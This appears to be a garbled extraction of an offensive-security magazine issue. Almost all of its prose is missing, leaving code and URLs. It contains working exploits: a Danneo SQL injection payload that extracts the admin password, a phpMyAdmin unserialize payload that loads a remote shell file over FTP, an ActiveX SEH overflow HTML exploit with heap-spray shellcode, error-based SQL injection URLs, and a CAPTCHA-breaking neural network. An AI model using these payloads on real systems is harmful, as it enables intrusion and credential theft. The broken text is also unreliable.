    $AllowedExecFunctions = array('shell_exec'=>true, 'passthru'=>true, 'system'=>true, 'exec'=>true);
    switch ($execfunction) {
        case 'passthru':
        case 'system':
            ob_start();
            $execfunction($command);
            $returnvalue = ob_get_contents();
            ob_end_clean();
            break;
        case 'exec':
            $output = array();
            $lastline = $execfunction($command, $output);
            $returnvalue = implode("\n", $output);
            break;
        case 'shell_exec':
            ob_start();
            $returnvalue = $execfunction($command);
            ob_end_clean();
            break;
    }
PHP
(, , , disable_functions
, , , passthru).
,
.
. phpThumb,
.
phpthumb.class.php:
function ImageMagickThumbnailToGD() {
case 'blur':
    if ($this->ImageMagickSwitchAvailable('blur')) {
        @list($radius) = explode('|', $parameter);
        $radius = ($radius ? $radius : 1);
        $commandline .= ' -blur '.$radius;
        unset($this->fltr[$filterkey]);
    }
    break;
$this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);
$IMresult = phpthumb_functions::SafeExec($commandline);
039
gnome-screensaver
:
$radius, $commandline, SafeExec();
- DebugMessage()
.
, ImageMagick
( blur"):
site.com/phpThumb.php?fltr[]=blur|5
- (
1 9, ):
http://site.com/phpThumb.php?phpThumbDebug=9
,
,
phpThumb.
EXPLOIT , . , ,
,
. *nix
:
http://site.com/phpThumb_1.7.9/phpThumb.
php?src=/home/site.com/public_html/kartinka.
040
SVN gnome-screensaver-svn
, . ,
Windows http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit.
phpThumb
$PHPTHUMB_CONFIG['prefer_imagemagick'] = false;
PHP
disable_functions.
03
phpThumb
comment VALUES (NULL,'".$id."','".$usermain['userid']."','".NEWTIME."', '$comname','$comtitle','$comtext','".REMOTE_ADDRS."')");
, $comtitle 255 ,
( -
041
WordPress
\', \ ")
$comtext. ,
./base/danneo.track.php, , , :
$baddata = array("UNION",
"OUTFILE",
"FROM",
"SELECT",
"WHERE",
"SHUTDOWN",
"UPDATE",
"DELETE",
"CHANGE",
"MODIFY",
"RENAME",
"RELOAD",
"ALTER",
"GRANT",
"DROP",
"INSERT",
"CONCAT",
"cmd",
"exec",
"--"
);
foreach($_REQUEST as $params => $inputdata){
foreach($baddata as $badkey => $badvalue){
if(is_string($inputdata) && eregi($badvalue,$inputdata)){ $badcount=1; }
}
}
][ , , ,
, ereg[i]
-,
$comtext, -
042
42
. Danneo, ./
base/danneo.function.php:
if(!ini_get("register_globals") || (@get_cfg_var('register_globals')==1)){
//@import_request_variables('GPC');
@extract($_COOKIE,EXTR_SKIP);
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_REQUEST,EXTR_SKIP);
if(get_magic_quotes_gpc()) {
if($_POST) $_POST = stripslashesall($_POST);
if($_GET) $_GET = stripslashesall($_GET);
if($_REQUEST) $_REQUEST = stripslashesall($_REQUEST);
if($_COOKIE) $_COOKIE = stripslashesall($_COOKIE);
}
, magic_quotes
stripslashesall() (
, $comtitle
$comtext SQL- ),
- :)
EXPLOIT :
1. $comname , 5-10 ;
2. $comtitle 254 ( magic_
quotes = off, \");
3. $comtext /*[NULL BYTE]*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- POST- :
comname=lololo&comtitle=[254 ]'&comtext=/*\
x00*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)--&id=[ID ]&ajax=0&re=comment
, SQL-
:
WordPress
.
http://www.inj3ct0r.com/exploits/11004.
04
WORDPRESS
BRIEF ,
, WordPress,
.
, 2.9 (trash) . , - ,
, ,
,
.
, , ,
.
./wp-includes/query.php, , publish:
if ( ('publish' != $status) ) {
    if ( ! is_user_logged_in() ) {
        // User must be logged in to view unpublished posts.
        $this->posts = array();
    } else {
        if (in_array($status, array('draft', 'pending')) ){
, :
1. ;
2. draft pending,
trash .
EXPLOIT , ,
trash- advisory http://tmacuk.co.uk/?p=180.
TARGETS WordPress 2.9, 2.9.1
SOLUTION ,
http://wordpress.org/download.
05
BUGZILLA
BRIEF
Bugzilla -, (,
https://bugzilla.mozilla.org).
,
.
,
.htaccess, ,
,
.
process_bug.cgi ( 249 ):
foreach my $group (@{$bug->product_obj->groups_valid})
, $bug->product_obj"
,
,
,
. , ,
, .
EXPLOIT
:
1. CVS/,
contrib/, docs/en/xml/, t/" old-params.txt,
;
2. ,
,
( ),
.
advisory
bugzilla.org/security/3.0.10.
TARGETS
: Bugzilla < 3.0.11, < 3.2.6, < 3.4.5, <3.5.3
: Bugzilla 3.3.1 3.4.4 3.5.1, 3.5.2
SOLUTION Bugzilla
: http://www.bugzilla.org/download (
.htaccess
). z
043
primat.isu@gmail.com
DVD
dvd
,
xakep.ru,
,
.
2.0
,
.
,
,
. CAPTCHA Completely Automated Public Turing test
to tell Computers and Humans Apart.
.
044
, . ,
,
. -,
, ,
(
LiveJournal). .
, , . ,
,
, ,
30
90%, .
1000 $1, .
, , ,
( -), , , .
,
.
, -
.
,
. ,
.
,
, , . ,
. PageRank ,
, ,
.
,
, , .
,
-. , 1%, ,
100 .
. , 6 ,
(10 + 26) ^ 6 2
., .
, ,
, , , 10 .
,
. ( ?),
. ,
.
: , .
,
,
. ,
,
. ,
,
. ,
4 (16x24 )
, .
,
- . ,
, . - .
, , . xakep.ru,
. , 10000
, .
, , , .
: , ,
, . ,
, .
,
, -, , -,
.
5% . , 20-
.
. .
. , 100 .
,
,
,
.
, . ,
, ,
(,
2716.jpg). , PHP Python,
Matlab,
. PHP,
image, imagecolorat. , ,
,
:
class Xakep_CAPTCHA
{
    // Euclidean distance between two colours in RGB space
    protected function colordist($color1, $color2)
    {
        return sqrt(pow((($color1 >> 16) & 0xFF) - (($color2 >> 16) & 0xFF), 2)
            + pow((($color1 >> 8) & 0xFF) - (($color2 >> 8) & 0xFF), 2)
            + pow(($color1 & 0xFF) - ($color2 & 0xFF), 2));
    }
    // Build a binary mask: 1 where a pixel is more than 200 away
    // from the background colour, 0 otherwise
    protected function update_mask()
    {
        $this->mask = array();
        for ($i = 0; $i < $this->width; $i++)
            for ($j = 0; $j < $this->height; $j++)
                $this->mask[$i][$j] = $this->colordist(imagecolorat($this->image, $i, $j), $this->bg_color) > 200 ? 1 : 0;
    }
, -,
, , -,
.
, ,
.
.
xakep.ru (~19 )
(16x24 ) . , , .
,
.
.
, .
( )
.
046
, (
). ,
4 ,
,
,
. : x, y (
) d
.
, .
, ,
,
. :
( ).
,
( ).
,
.
,
,
.
, . ,
(,
).
() ,
. ,
. ,
..
x, y d, .
:
//
,
, .
.
90%
- . 4
(16x24 ):
protected function divide_digits($params)
{
    $this->digits = array();
    for ($i = 0; $i < $this->digits_quantity; $i++)
    {
        // New true-colour image for one digit
        $this->digits[$i]['image'] = imagecreatetruecolor($this->digit_width, $this->digit_height);
        $this->digits[$i]['width'] = $this->digit_width;
        $this->digits[$i]['height'] = $this->digit_height;
        for ($x = 0; $x < $this->digit_width; $x++)
        {
            for ($y = 0; $y < $this->digit_height; $y++)
            {
                // Horizontal shift for this row, proportional to $params['d']
                $d = round($params['d'] * ($y / $this->digit_height));
                $color = imagecolorat($this->image, $x + $this->digit_kerning * $i + $d + $params['x'], $y + $params['y']);
                imagesetpixel($this->digits[$i]['image'], $x, $y, $color);
            }
        }
    }
}
.
, .
, .
(
). . ,
0 1.
:
. ,
. (feedforward ),
( )
().
( )
(, ).
: , .
. , , ,
,
.
,
Fast Artificial Neural
Network (www.leenissen.dk/fann). ,
. :
//
// :
// 1.
// 2. (1 )
// 3.
$ann = fann_create(array(384, 150, 10), 1, 0.7);
//
// :
// 1.
// 2. (, ,
)
// 3.
// 4.
// 5. ,
384, 150 10 .
() (1624
= 384) , 0 1 ( ), , 10
0 1, :
, , .
, , ,
,
.
,
047
RAZ0R HTTP://RAZ0R.NAME
, :
function train()
{
$dir = "samples/";
$set = array();
if ($dh = opendir($dir))
{
while (($file = readdir($dh)) !== false)
{
if (filetype($dir.$file) == 'file')
{
$answer = str_replace('.jpg', '', $file);
$xc = new Xakep_CAPTCHA($dir.$file, 'ann.data', 4, $answer);
$out = $xc->parse();
$set []= $xc->sample;
}
}
closedir($dh);
}
$ann = fann_create(array(384, 150, 10), 1, 0.7);
fann_train($ann, $set, 10000, 0.001, 100);
fann_save($ann, 'ann.data');
}
100 43% ,
3% (0.43 ^ 4), .
100 , 55% 10% . ,
1-2
,
10-20 . , , ,
. :
function test()
{
$dir = "test/";
$c = 0;
$wins = 0;
if ($dh = opendir($dir))
{
048
, ,
, .
,
, . xakep.ru
? -, , ,
. -, ,
,
. -,
6,
.
. , , , ,
SMS ( Google ).
, ,
. ,
,
OpenID-, .z
RECAPTCHA
,
,
reCAPTCHA (recaptcha.net). reCAPTCHA
. ,
,
. ,
, , ,
. reCAPTCHA ,
,
,
.. OCR-. ,
reCAPTCHA
, . reCAPTCHA
,
.
(ocr-research.org.ua)
. ,
,
.
-,
( ). -,
,
, ,
. ,
. ,
,
.
.
,
,
.
mail.ru.
.
.
.
, ,
,
: ,
.
.
, ,
, .
.
:
,
. ,
, mail.ru
.
(
brightcove.newscientist.com/services/player/bcpid2227271001?bctid=47814603001).
(,
) ,
.
.
,
.
,
. ,
,
.
,
,
. ,
(
),
.
,
.
049
icq 884888, http://snipper.ru
UNSERIALIZE
, ! ][
PHP
. ,
unserialize .
,
, -
.
!
Piwik phpMyAdmin.
PIWIK
Piwik.
, Piwik -, Google analytics.
phpMyVisites (phpmyvisites.us).
: ( WordPress), API (
xml, json, php, csv),
, ( drag and drop-), , real time-
- (
250 ).
, Piwik
sourceforge.net "Infoworld Bossie Award"
. ,
unserialize Piwik.
ZEND FRAMEWORK
,
PHP- Zend
Framework , ,
unserialize().
, Piwik - :)
,
050
( 0.4.5
).
./core/Cookie.php :
protected function loadContentFromCookie()
{
    $cookieStr = $_COOKIE[$this->name];
    $values = explode(self::VALUE_SEPARATOR, $cookieStr);
    foreach($values as $nameValue){
        ...
        if(!is_numeric($varValue)){
            $varValue = base64_decode($varValue);
            // some of the values may be serialized array so we try to...
            if(($arrayValue=@unserialize($varValue)) !== false
                // we set the unserialized version only for arrays...
                && is_array($arrayValue)
            )
            {
                $varValue = $arrayValue;
            }
            ...
        }
advisory phpMyAdmin
phpMyAdmin
HTTP://WWW
links
, , , :
"=",
, ;
base64_decode() (, ,
-)
unserialize().
(, )
, Zend Framework.
:)
PDF ,
,
Zend_Log.
./libs/Zend/Log.php
:
public function __destruct()
{
foreach($this->_writers as $writer) {
$writer->shutdown();
}
}
shutdown() , _writers.
shutdown-.
./libs/Zend/Log/Writer/Mail.php:
public function shutdown()
{
    ...
    if (empty($this->_eventsToMail)) {
        return;
    }
    ...
    if ($this->_layout) {
        ...
        // If an exception occurs during rendering, convert it to a notice
        // so we can avoid an exception thrown without a stack frame.
        try {
            $this->_mail->setBodyHtml($this->_layout->render());
        } catch (Exception $e) {
            ...
    try {
        $this->_mail->send();
    } catch (Exception $e) {
        ...
    }
    ...
}
- , ,
e-mail. , .
unserialize-.
-, ,
,
:).
, render.
Piwik_View
./core/View.php:
public function render()
{
    try {
        ...
    } catch(Exception $e) {
        // can fail, for example at installation (no plugin loaded yet)
    }
    ...
    return $this->smarty->fetch($this->template);
}
,
, ,
Smarty .
SMARTY
, Smarty PHP- , .
, fetch() ./libs/
Smarty/Smarty.class.php:
function fetch($resource_name, $cache_id = null, ...)
{
    ...
    if ($display && !$this->caching && count($this->_plugins['outputfilter']) == 0) {
        if ($this->_is_compiled($resource_name, $_smarty_compile_path)
            || $this->_compile_resource($resource_name, $_smarty_compile_path))
        {
            include($_smarty_compile_path);
piwik.org Piwik
builds.piwik.org/?
C=M;O=D
Piwik
suspekt.org/2009/
12/09/advisory032009-piwikcookie-unserializevulnerability Piwik
Cookie unserialize()
Vulnerability
framework.zend.
com/download
Zend Framework
smarty.net
Smarty
php.net/call_user_
func_array call_
user_func_array()
suspekt.org/
downloads/Piwik_
Smarty.txt
Piwik
Smarty
suspekt.org/
downloads/Piwik_
Config.txt
Piwik
gnucitizen.org/
static/blog/2009/06/
phpmyadminrcesh.
txt phpMyAdmin '/
scripts/setup.php'
PHP Code Injection
RCE PoC v0.11
snipper.ru/view/12/
phpmyadmin2119-unserializearbitrary-php-codeexecution-exploit
phpMyAdmin <= 2.11.9
forum.antichat.ru/
thread99589-file_
exists.html
file_
exists ftp
Piwik
timestamp
advisory
}
} else {
...
_compile_resource :
function _compile_resource($resource_name, $compile_path)
{
    $_params = array('resource_name' => $resource_name);
    if (!$this->_fetch_resource_info($_params))
    {
        return false;
    }
_fetch_
resource_info
:
function _fetch_resource_info(&$params)
{
    ...
    switch ($_resource_type) {
        case 'file':
            ...
            break;
        default:
            // call resource functions to fetch the template source and
            if ($params['get_source'])
            {
                $_source_return = isset($this->_plugins['resource'][$_resource_type])
                    && call_user_func_array(
                        $this->_plugins['resource'][$_resource_type][0][0],
                        array($_resource_name, &$params['source_content'], &$this));
                ...
            }
! PHP-
call_user_func_array
callback- :).
call_user_func_
array :
callback-
,
.
PHP :
1. eval(), ,
, ,
call_user_func_array;
2. assert() ( eval)
, ,
3 ,
assert .
-
,
Smarty eval:
function _eval($code, $params=null)
{
    return eval($code);
}
2 ,
.
,
PHP,
,
.
,
(
).
,
base64_encode , , evil-,
PHP- Piwik.
,
unserialize
.
PHPMYADMIN
:).
,
, ,
MySql phpMyAdmin
2.11.9 ( , ,
). ,
./scripts/setup.php
,
. ,
,
./config
( ),
.
.
, ./scripts/setup.php
,
unserialize:
if (isset($_POST['configuration']) && $action != 'clear')
{
    // Grab previous configuration, if it should not be cleared
    $configuration = unserialize($_POST['configuration']);
}
, $_
POST['configuration']
unserialize() ,
__wakeup __destruct.
- ./libraries/Config.
class.php:
function __wakeup() {
    if (! $this->checkConfigSource()
      || $this->source_mtime !== filemtime($this->getSource())
      || $this->default_source_mtime !== filemtime($this->default_source)
      || $this->error_config_file
      || $this->error_config_default_file) {
        $this->settings = array();
        $this->load();
        $this->checkSystem();
    }
    ...
}
, phpinfo() Piwik
,
load().
:
function load($source = null)
{
    ...
    if (! $this->checkConfigSource()) {
        return false;
    }
    ...
    if (function_exists('file_get_contents'))
    {
        $eval_result = eval('?>' . trim(file_get_contents($this->getSource())));
    } else
    {
        $eval_result = eval('?>' . trim(implode("\n", file($this->getSource()))));
    }
    ...
}
, eval-,
PHP-
:).
getSource checkConfigSource:
function getSource() {
    return $this->source;
}
...
function checkConfigSource() {
    ...
    if (! file_exists($this->getSource()))
    {
        ...
        return false;
    }
    if (! is_readable($this->getSource())) {
        ...
        die('Existing configuration file (' . $this->getSource() . ') is not readable.');
    }
    ...
    $perms = @fileperms($this->getSource());
    if (!($perms === false) && ($perms & 2))
    {
        ...
        die('Wrong permissions on configuration file, should not be world writable!');
    }
    return true;
}
:)
, , , . file_exists(), is_readable() fileperms()
file_get_contents() URL PHP . . PHP 5,
ftp, file_exists('ftp://ftp.com/
shell.txt') true. http
. ,
,
unserialize, $_POST['configuration']
( "source"):
INFO
info
Raz0r' raz0r.
name/obzory/novyesposoby-obxoda-wafi-php-eksploity.
unserialize-
vBulletin, ,
,
.
O:10:"PMA_Config":1:{s:6:"source";s:70:"ft
p://login:password@tvoy_host.com/www/shell.
txt";}
phpinfo(), shell.txt
ftp- "<? phpinfo();exit; ?>"
(exit; , "Fatal
error").
.
EPIC WIN
, , PHP,
, ! .
( :)
. , ,
unserialize-
,
. ! z
d0znpp http://oxod.ru
,
-
-,
.
,
. , ,
.
CMS, ,
. .
.
,
,
.
, ,
-,
. ,
,
, .
.
,
max_execution_time
500- . -,
.
(
TIFF), .
11 ,
. ,
,
.
Register_Globals=ON.
,
,
,
.
PHP
.
PHP :
max_execution_time
max_input_nesting_level
max_input_time
memory_limit
pcre.backtrack_limit (PHP>=5.2.0)
pcre.recursion_limit (PHP>=5.2.0)
post_max_size (PHP>=4.0.3)
upload_max_filesize
max_file_uploads (PHP>=5.2.12)
, , common :).
( )
php.net/manual/en/ini.list.
php. max, limit.
. ,
, :
,
PHP -.
,
, ,
max_execution_time,
memory_limit.
error_reporting=E_
ERROR , display_errors=On.
GET.
max_input_nesting_
level.
max_execution_time
. , ,
.
, , ,
.
, .
64. ,
, .
:
GET
. , .
, ( ). PHP
:
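function fuzz_max_uri_len($url)
{
    $headers = array();
    $data = array();
    $left = 500;    // lower bound of the search range
    $right = 64000; // upper bound of the search range
    $accur = 5;     // stop once the range is narrower than this
    while (($right - $left) > $accur) {
        // bisect the range; the length passed to str_repeat() must be an integer
        $cur = (int)(($right + $left) / 2);
        $data['x'] = str_repeat("x", $cur);
        list($h, $c, $t) = sendGetRequest($url, $headers, $data);
        // status code taken from the response status line, e.g. "HTTP/1.1 200"
        $s = intval(substr($h, 9, 3));
        if ($s < 400) {
            $left = $cur;
        }
        else {
            $right = $cur;
        }
        echo "\n$cur\t$s";
    }
    return(($right+$left)/2);
}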
max_input_nesting_level
,
, , max_input_nesting_level=1 ?a[][], ,
Notice,
, .
2
, Array. ,
,
-
, ,
Array. -
. ,
,
, .
,
:). ,
.
-
,
. PoC
, ,
. ,
.
,
.
HTTP://WWW
links
oxod.ru ,
,
.
php.net , .
:)
Allowed memory size exhausted. , PHP- <?php echo OK;?>.
, ?!
, . ,
, , .
PHP
}
}
return intval($mem);
}
GET. , :)
,
, . ,
,
. ,
?a([]x2500 )
1.2 . , ,
, memory_limit,
.
,
:
PoC . ,
,
. 20 .
memory_get_usage().
.
, a
GET. -
1 .
, ,
?a=aaa,
.
GET- (
).
?a[],
500 .
,
max_input_nesting_level.
auto_append_file
php.ini. ,
. :
function findMarker($content)
{
    $p1 = strpos($content, "ONsec E500 mem:");
    if ($p1===false){
        return 0;
    }
    else {
        $p2=strpos($content,"#",$p1);
        if ($p2===false){
            return 0;
        }
        else {
            $mem = substr($content, $p1+15, $p2-$p1-15);
.
. ,
,
, .
, .
, POST,
.
PoC
fuzz_memory_usage().
(POST,GET,Multipart)
.
, ,
, .
,
,
, . ,
max_execution_time, .
OWASP,
dead_code. ,
, ,
. ,
-
, ,
, . ,
, . ,
.
, .
,
, .
, ,
,
. -
,
,
. , ,
, ,
, .
,
. ,
,
, . ,
,
-.
GET .
PoC. 30 83
, 126 .
GET .
.
, :
1. , ,
(16^3=4096).
2. , .
3. 250 ,
, . .
,
. Multipart, . -,
, .
20 , , .
foreach($results as $key=>$value){
if ($value['path']==$path){
$unique=false;
break;
}
}
if ($unique){
$len = $p3-$p2;
$res = array('path'=>
substr($filedata,$p2,$len),'len'=>$fsize);
$results[$i]=$res;
$i++;
}
}
}
fclose($fh);
}
closedir($dh);
$size=count($results)-1;
//
for ($i = $size; $i>=0; $i--) {
for ($j = 0; $j<=($i-1); $j++)
if ($results[$j]['len']>$results[$j+1]['len']) {
$k = $results[$j];
$results[$j] = $results[$j+1];
$results[$j+1] = $k;
}
}
return $results;
,
. :
function parseResults($dir)
{
if (is_dir($dir))
{
if ($dh = opendir($dir))
{
$i=0;
$results = array();
while (($file = readdir($dh)) !== false)
{
$curFile = $dir.$file;
$fh = fopen($curFile, 'r');
$filedata = fread($fh, filesize($curFile));
$fsize = filesize($curFile);
$p1 = strpos($filedata,"Maximum execution time of ");
if ($p1 === false) {}
else{
$p2 = $p1+52;
$p3 = strpos($filedata,"</b>",$p2);
if ($p3 === false) {}
else{
$len = $p3-$p2;
$path = substr($filedata,$p2,$len);
$unique = true;
//
}
}
}
, .
, .
, 126 30 .
. ,
PoC !
. ,
, ,
. ,
, .
, PoC .
. , .
, .z
aka Don_Huan dookie@inbox.ru
ACTIVEX
ActiveX-
. 2006
,
.
ActiveX
COM- Microsoft , ,
DLL
OLE- OCX,
, , , .
HTML <object >,
CLSID. ,
JavaScript-
ActiveXObject(..),
ProgID. CLSID
{11111111-2222-3333-4444-555555555555}. ProgID , ,
CLSID. CLSID, ProgID COM- .
: HTML
ActiveX ,
( :
XSS
HTML-
..),
.
,
. :
,
,
,
. , ,
, ActiveX
,
,
. ,
, .
,
. ActiveX-
, , .
. , ActiveX CLSID {11111111-2222-3333-4444-555555555555}.
,
HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}
Implemented Categories (
, ,
).
,
.
{7DD95802-9882-11CF-9FA9-00AA006C42C4}
{7DD95801-9882-11CF-9FA9-00AA006C42C4}
,
.
, ,
KillBit. -
HKEY_LOCAL_
,
.
.
?
,
/++, , .
,
, . , .
Fuzzing-,
COMRaider [labs.idefense.com/
software/fuzzing.php]. , AXman
[digitaloffense.net/tools/axman/],
COMRaider, . ActiveX, .
, IE. , .
, .
,
, ActiveX. ,
,
, , .
. ,
,
.
fuzzing
,
ExecuteCmd()?
, COMRaider.
,
COMRaider
FileMon RegMon. ,
, . COMRaider.
,
View .
Options , Edit
BuildArgs.vbs.
,
Visual Basic-. GetStrArgs(),
.
for i=100 to 10000 step 1000
    parent.strs.add "String(" & i & ", ""A"")"
next
DVD
dvd
,
ActiveX, .
( !!!)
100 10000 1000. 10000,
100000. 20
.
%s %n
.
:
parent.strs.add """C:\31337.txt"""
parent.strs.add """31337"""
parent.strs.add """http://""+String(10000, ""B"")"
parent.strs.add """C:\""+String(10000, ""B"")"
.
,
.
SEH !
heap spray
Start,
Scan a directory for registered COM servers.
. ,
, ,
.
. ,
.
, COMRaider
,
.
, FileMon
. , ActiveX,
heap spray
,
: %WINDIR%\Downloaded Program
Files. 5000 .
, ,
Bulid Obj Safety Report for Selected
COMRaider
. , .
.
.
. ,
. ,
.
,
, Internet Explorer .
Start Choose from controls that should be
loadable in IE.
.
FileMon RegMon 31337. ,
,
. ,
COMRaidere,
,
Scan Selected For Strings,
file
,path,url,key,load,download,safe,read,write,file,e
xecute .. ( ) . ,
, -
FileMon
COMRaider
parent.strs.add """"&stri&"""" next
Fuzz Selected. COMRaider,
,
,
-.
Begin Fuzzing,
:).
, . , .
emsmtp.dll 6- . , , Oracle Document
Capture (10.1350) (oracle.
com/technology/software/products/contentmanagement/index_dc.html), .
, .
Caused Exception,
. , ,
,
, ,
. ,
, EIP
41414141,
, SEH .
,
. ,
.
OllyDBG (ollydbg.de).
COMRaider,
Launch in Olly.
, F9,
.
Olly
,
CMP,
[ESI+180] .
ESI A
""
0x41414141, ,
0x41414141+0x180=0x414142C1
,
. ,
( ).
,
41,
SEH .
, ,
, ,
,
CALL DWORD PTR DS:[ESI+CC],
ESI ,
SEH,
ESI.
, , ,
.
,
,
. ,
.
308 .
, SEH .
, 308 , 4 SEH-.
100 ,
ESI
.
COMRaider, BuildArgs.vbs:
beg=256
stri=String(beg,"0")
letter="A"
for i=(beg+4) to 500 step 4
if letter="Z" then
letter ="A"
end if
stri=stri+String(4,letter)
letter=Chr(Asc(letter)+1)
, 260
, 4
ESI. 4
, 4 ,
.
32- 4 ,
SEH. ,
:
fill= String(260, "X")
parent.strs.add """&fill&"CCCCFFFF
AAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFBBBB"""
:
ESI=CCCC (43434343)
SEH=BBBB (42424242)
=AAAA (41414141)
, ESI,
CCCC , .
SEH-.
,
,
SEH-. ,
, ,
,
, ,
,
. ,
. .
,
.
( IE 6/7,
) .
(exploit-db.com/exploits/10007) SEH-
jmp esp user32.dll.
ESP ( ),
.
user32.dll
. ,
. ,
. -
RAZ0R HTTP://RAZ0R.NAME
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk; //
//nop nop-slide
var mem=new Array();
for(i=0; i<400;i++)
mem[i]=bigbk+shell; //
nop-slide,
.
, unicode-.
. 0xAA
0xBB 0xCC 0xDD JavaScript unicode
%uBBAA %uDDCC.
JavaScript. .
, .
JavaScript :
,
. , , , ,
( perl): C:\>perl shellcodegen.pl exec
notepad. , :
<HTML>
<HEAD>
<TITLE>][akep ActiveX SEH Sploit</
TITLE>
</HEAD>
<BODY>
<OBJECT id='vuln'
classid='clsid:68AC0D5F-0424-11D5822F-00C04F6BA8D9'></object>
<SCRIPT>
function Exploit(){
// exec notepad
var shell = unescape("%ue8fc%u0089
%u0000%u8960%u31e5%u64d2%u528b%u8b3
0%u0c52%u528b%u8b14%u2872%ub70f%u26
4a%uff31%uc031%u3cac%u7c61%u2c02%uc
120%u0dcf%uc701%uf0e2%u5752%u528b%u
8b10%u3c42%ud001%u408b%u8578%u74c0%
u014a%u50d0%u488b%u8b18%u2058%ud301
%u3ce3%u8b49%u8b34%ud601%uff31%uc03
1%uc1ac%u0dcf%uc701%ue038%uf475%u7d
03%u3bf8%u247d%ue275%u8b58%u2458%ud
062
301%u8b66%u4b0c%u588b%u011c%u8bd3%u
8b04%ud001%u4489%u2424%u5b5b%u5961%
u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86
%u016a%u858d%u00b9%u0000%u6850%u8b3
1%u876f%ud5ff%ue0bb%u2a1d%u680a%u95
a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u7
5e0%ubb05%u1347%u6f72%u006a%uff53%u
6ed5%u746f%u7065%u6461%u0000");
//
// 0x0d0d0d0d c 99%
var bigbk=unescape("%u9090%u9090%u
9090%u9090");
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk;
var mem=new Array();
for(i=0; i<400;i++)
mem[i]=bigbk+shell;
var bf=unescape("%63"); //
var buf="";
while (buf.length<260) buf=buf+bf;
buf+=unescape("%61%61%61%61"); //
ESI
buf+="FFFF"+unescape("%62%62%62%62"
);//
buf+="THX_TO_MY_WIFE_FOR_
LOVE!FFFFFFFF";
buf+=unescape("%0d%0d%0d%0d");//SEH
vuln.SubmitToExpress(buf);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
, 308 , :
"<260>aaaaFFFFbbbbTHX_TO_
MY_WIFE_FOR_LOVE!FFFFFFFF[ SEH
]". ESI, bbbb
,
.
308 0x0d .
html-,
-
"notepad"
(,
ActiveX ).
, SEH CALL [ESI+CC]
.
:
var mem=new Array();
var i=0;
// c
var bigbk=unescape("%u0d0d%u0d0d%u
0d0d%u0d0d");
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk;
for(; i<200;i++) mem[i]=bigbk+unes
cape("%u0d0d%u0d0d%u0d0d%u0d0d");
// nop-
var bigbk2=unescape("%u9090%u9090%
u9090%u9090");
while(bigbk2.length<0x40000)
bigbk2=bigbk2+bigbk2;
for(; i<400;i++)
mem[i]=bigbk2+shell;
// 0x0d0d0d0d c 99%
var bf=unescape("%63");
var buf="";
while (buf.length<260) buf=buf+bf;
//
//CALL [0x05050505+CC]
//EIP 0x0d0d0d0d.
.
f+=unescape("%05%05%05%05"); //ESI
buf+="FFFF"+unescape("%61%61%61%61"
);//
buf+="HI_TO_KONONENCHEG_
FFFFFFFFFFFFFF";
buf+=unescape("%62%62%62%62");//SEH
vuln.SubmitToExpress(buf);
. . .
, ,
FileMon,
:\31337.txt. ,
ImportBodyText,
,
. ,
,
BodyText:
. . .
vuln.ImportBodyText("C:\boot.ini");
alert(vuln.BodyText);
. . .
,
IE 6/7 ActiveX.
,
,
.
,
. , ,
,
, .
,
, ,
Digital Security Research Group.
research@dsec.ru! z
(Positive Technologies) http://devteev.blogspot.com
ERROR
BASED SQL-INJECTION
ERROR-BASED
SQL-INJECTION
SQL-
, ,
(union).
. ,
?!
, SQL-,
. .
,
, , .
Qwazar "
" SQL- ,
MySQL. ,
.
MySQL >= 5.0:
,
( MySQL < 5.0, ),
,
rand().
, http-.
:
http://server/?id=(1)and(select+1+fr
om(select+count(*),concat((select+ta
Qwazar MySQL,
3.x, -
. , , MySQL 4.1,
.
, TinKode,
blind SQL-Injection
Web- army.mil.
Web-,
MSSQL 2000/2005,
.
TinKode ,
MSSQL
, "" :
select convert(int,@@version);
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar
value 'Microsoft SQL Server 2008 (RTM) 10.0.1600.22 (Intel X86)
Jul 9 2008 14:43:34
Copyright (c) 1988-2008 Microsoft
Corporation
Enterprise Edition on Windows NT 6.1
<X86> (Build 7600: ) (VM)
' to data type int.
, SQL-,
,
Microsoft SQL Server. ,
:
http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=1)))-http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=2)))-...
SQL
, :
http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+0)+as+numeric)-http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+1)+as+numeric)-...
WARNING
warning
!
!
,
!
SQL-,
, .
, .
:
MSSQL
TinKode MSSQL/2008
Oracle. ,
.
, error-based blind SQL
Injection ,
XML. ,
XMLType(),
(LPX-00XXX):
SQL> select XMLType((select
'abcdef' from dual)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00210: expected '<' instead
of 'a'
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line
301
ORA-06512: at line 1
no rows selected
SQL>
. substr()
. ,
:
select XMLType((select
substr(version,1,1) from
v$instance)) from users;
select XMLType((select
substr(version,2,1) from
v$instance)) from users;
select XMLType((select
substr(version,3,1) from
v$instance)) from users;
... ..
,
limit offset,
. , XMLType()
XMLTYPE()
SQL-
, ,
.
XMLType(),
,
:
SQL> select XMLType((select
'<abcdef:root>' from dual)) from
dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00234: namespace prefix
"abcdef" is not declared
...
SQL> select XMLType((select
.
,
at ("@") .
;) upper().
, :
select id from(select id,rownum rnum from users a)where rnum=1;
select id from(select id,rownum rnum from users a)where rnum=2;
...
, , ,
hex-. ,
blind SQLi PostgreSQL
